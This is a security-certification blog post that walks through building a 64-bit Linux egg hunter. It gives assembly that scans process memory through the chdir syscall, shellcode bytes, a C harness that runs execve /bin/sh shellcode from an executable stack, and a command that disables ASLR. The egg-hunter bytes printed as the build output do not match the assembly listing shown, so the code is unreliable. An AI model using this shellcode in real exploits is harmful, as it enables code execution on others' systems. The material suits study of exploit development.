This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification:
https://www.pentesteracademy.com/course?id=7
Student ID: PA-30398
The files for this assignment are:
Now comes the question: what is an Egg Hunter?
According to a paper titled [Egg Hunter - A twist in Buffer Overflow](https://www.exploit-db.com/docs/english/18482-egg-hunter---a-twist-in-buffer-overflow.pdf) published by Ashfaq Ansari on Exploit-DB:
The Egg hunting technique is used when there are not enough available consecutive memory locations to insert the shellcode. Instead, a unique "tag" is prefixed with shellcode.
When the "Egg hunter" shellcode is executed, it searches for the unique "tag" that was prefixed with the large payload and starts the execution of the payload.
To implement an egg-hunter for x64 Linux systems, I'm referring to the same whitepaper I used for the previous SLAE32 exam. It shows some techniques you can employ in your own implementation.
Since the SIGSEGV handler technique is considered infeasible, mainly due to its size, I decided to use the system call technique instead.
As the name implies, it's based on the usage of system calls to scan the memory of the process in search of the so-called egg.
Given that size is very important in egg-hunter shellcodes, we need syscalls that do not require complex data structures. The best case is an idempotent syscall that accepts a single pointer argument.
For this reason, I performed some grep searches on the man pages installed on my system, and I discovered a few matches:
# Requirements:
- sudo apt install manpages-dev
- sudo find /usr/share/man/man2/ -type f -name "*.gz" -exec sh -c "gunzip {}" \;
- cd /usr/share/man/man2
grep -RiE '\(const char\s*?\*"\s[a-zA-Z]*\s*\)'
# chroot.2:.BI "int chroot(const char *" path );
# unlink.2:.BI "int unlink(const char *" pathname );
# delete_module.2:.BI " int delete_module(const char *" name );
# umount.2:.BI "int umount(const char *" target );
# rmdir.2:.BI "int rmdir(const char *" pathname );
# acct.2:.BI "int acct(const char *" filename );
# chdir.2:.BI "int chdir(const char *" path );
# swapon.2:.BI "int swapoff(const char *" path );
# uselib.2:.BI "int uselib(const char *" library );
Theoretically, all of them should allow me to test whether a given memory address is valid.
However, I chose the chdir syscall, since it would not change the state of the system as much as unlink and rmdir, which seem far more dangerous.
The function prototype of the chdir syscall is as follows:
#include <unistd.h>
int chdir(const char *path);
As you can see, it accepts a single pointer argument.
All it does is try to change the Current Working Directory (CWD) to the path the argument path points to.
Since it accepts a pointer, we can use it to test memory addresses.
Moreover, the kernel validates the pointer itself when it copies the path from user space, so an invalid address does not raise a SIGSEGV and crash the program.
Instead, the syscall returns the error EFAULT (-14, whose low 32 bits are 0xfffffff2), indicating that a bad address was passed as the argument of the syscall.
My implementation in assembly language follows:
; Author: Robert Catalin Raducioiu
global _start
section .text
_start:
; start searching for the egg from the address 0x0
xor edi, edi
NextPage:
; go to the next memory page (each one is 0x1000 bytes)
or di, 0xfff
; go to the next memory address
inc rdi
CheckAddress:
; call the syscall 80 (chdir)
xor eax, eax
mov al, 80
syscall
; check if the last byte of RAX is equal to the last byte
; of the error EFAULT (0xfffffff2)
cmp al, 0xf2
jz NextPage
; set EAX to the egg
mov eax, 0x74636273
dec eax
; compare the egg with the bytes pointed to by RDI
; also increase RDI by 4
scasd
; if it is not the egg, then go back and check the next address
jnz CheckAddress
; jump at the beginning of the actual shellcode
call rdi
Note that the egg hunter does not contain an exact copy of the egg: the stored value is slightly modified, in this case its lowest byte is increased by 0x1.
Therefore, in order to calculate the real egg, it uses the assembly instruction DEC to decrease the value of the modified egg.
This was done to avoid a second exact occurrence of the egg in memory, which could lead the egg hunter to find its own copy instead of the egg prepended to the shellcode.
To obtain the shellcode from the previous assembly program, you can use these commands:
nasm -f elf64 egghunter.nasm
objcopy -O binary -j .text egghunter.o /dev/stdout | od -An -t x1 | tr -d '\n' | sed -r 's/^ |$/"/g;s/\s?([0-9a-f]{2})/\\x\1/g'
# Result:
# "\x31\xff\x48\xf7\xe7\x66\x81\xcf\xff\x0f\x48\xff\xc7\x31\xc0\xb0\x50\x0f\x05\x3c\xf2\x74\xee\x8b\x17\xbe\x73\x62\x63\x74\xff\xce\x39\xf2\x75\xe6\x48\x83\xc7\x04\xff\xd7"
During my tests, I noticed that the egg hunter needed a long time to find the egg and execute the real shellcode. This is caused by the size of the 64-bit address space.
In fact, while x86 systems use 32 bits for virtual addresses, most x86-64 systems use 48 bits.
System | Number of memory pages |
---|---|
x86 | 2^32 / 0x1000 = 1,048,576 |
x86-64 | 2^48 / 0x1000 = 68,719,476,736 |
From the table above, we can see that an x86-64 process has 2^16 = 65536 times as many pages to scan as an x86 process.
Time-wise, I would have to wait more than 10 hours to find an egg in a 64-bit process, while it would take seconds or minutes in a 32-bit process.
For testing purposes, I chose to speed up the process by starting from an address closer to the location of the real shellcode.
To do this, first I had to disable ASLR (Address Space Layout Randomization) on my Linux host:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# to enable it again:
# echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
After that, I wrote a simple C program to test the egghunter shellcode:
#include <stdio.h>
#include <string.h>

#define EGG "\x72\x62\x63\x74"

int main(int argc, char *argv[])
{
    /* Shellcode for spawning /bin/sh, with the egg prepended */
    unsigned char shellcode[] = EGG "\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x83\xc0\x3b\x0f\x05";
    /* Egg hunter: scans memory for the egg and jumps to the bytes after it */
    unsigned char egghunter[] = "\x31\xff\x48\xf7\xe7\x66\x81\xcf\xff\x0f\x48\xff\xc7\x31\xc0\xb0\x50\x0f\x05\x3c\xf2\x74\xee\x8b\x17\xbe\x73\x62\x63\x74\xff\xce\x39\xf2\x75\xe6\x48\x83\xc7\x04\xff\xd7";

    printf("[+] Shellcode length: %zu\n", strlen((const char *)shellcode));
    printf("[+] Egg-hunter length: %zu\n", strlen((const char *)egghunter));

    /* Run the egg hunter from the stack (requires an executable stack) */
    int (*ret)() = (int(*)())egghunter;
    ret();
    return 0;
}
Next, I compiled it with gcc:
gcc -w -o test_egghunter -zexecstack ./test_egghunter.c
As expected, when I ran the program it did not spawn a shell right away, since the search would require many hours.
Since the real shellcode is stored on the stack (it is a local variable within the main function), I decided to retrieve the address range of the stack and initialize the RDI register of the egghunter shellcode with an address in that range.
Doing so, the testing program would be able to find the egg, and execute the real shellcode in a matter of seconds.
First things first, to retrieve the starting address of the stack I ran the commands below while the testing program was still running:
# get the PID of the testing program
ps aux | grep test_egghunter
# kali 21105 98.6 0.0 2424 680 pts/1 R+ 05:47 0:38 ./test_egghunter
# get the base address of the stack
cat /proc/21105/maps
# 7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]
After that, I added the following line to the NASM program:
--- egghunter.nasm 2022-06-26 08:42:28.986705942 -0400
+++ egghunter_fast.nasm 2022-06-26 08:42:35.690706235 -0400
@@ -8,6 +8,7 @@
; start searching for the egg from the address 0x0
xor edi, edi
+ mov rdi, 0x7fffffff0000
NextPage:
Running the testing program again with the new egghunter shellcode, the latter successfully found the egg and passed execution to the real shellcode, which spawned a simple /bin/sh shell.
The following figure demonstrates the result: